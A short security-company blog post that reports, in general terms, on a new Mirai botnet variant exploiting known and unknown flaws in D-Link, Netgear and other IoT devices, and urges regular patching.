New Vulnerabilities are being used by the New Mirai variant

Mirai Variant Blogs | IEMLabs

The security flaws in D-Link, netgear, etc. are being abused by the new variant of Mirai. Since the month of February, this has targeted six known and    three previously unknown vulnerabilities, to infect systems and add them to the botnet network.

There are more than 60 variants of Mirai which are known to take advantage of both known and unknown vulnerabilities in the Iot devices.

The latest attacks are based on the Mirai’s source code, and they have some additional vulnerabilities targeting the Iot devices.

Use of binaries-

After initializing, the botnet uses wget utility for downloading a shell script from the malwares infrastructure, the shell scripts downloads various Mirai binaries and subsequently run them-

  •       Lolol[.]sh- This has the ability to delete the key folders from the target machine;
  •       Install[.]sh- Downloads various files and packages that comprises of files that include combinations of multiple credential that are used for brute-force and nbrute.
  •       Dark.[arch]: Mainly used for propagation by using the initial exploits of Mirai.

Due to this, unpatched connected devices always remain at risk. That is why it is important that patches are applied and updated regularly to the Iot devices and firmware.


By Hrithik Lall

IEMLabs is an ISO 27001:2013 and ISO 9001:2015 certified company, we are also a proud member of EC Council, NASSCOM, Data Security Council of India (DSCI), Indian Chamber of Commerce (ICC), U.S. Chamber of Commerce, and Confederation of Indian Industry (CII). The company was established in 2016 with a vision in mind to provide Cyber Security to the digital world and make them Hack Proof. The question is why are we suddenly talking about Cyber Security and all this stuff? With the development of technology, more and more companies are shifting their business to Digital World which is resulting in the increase in Cyber Crimes.

Leave a comment

Your email address will not be published.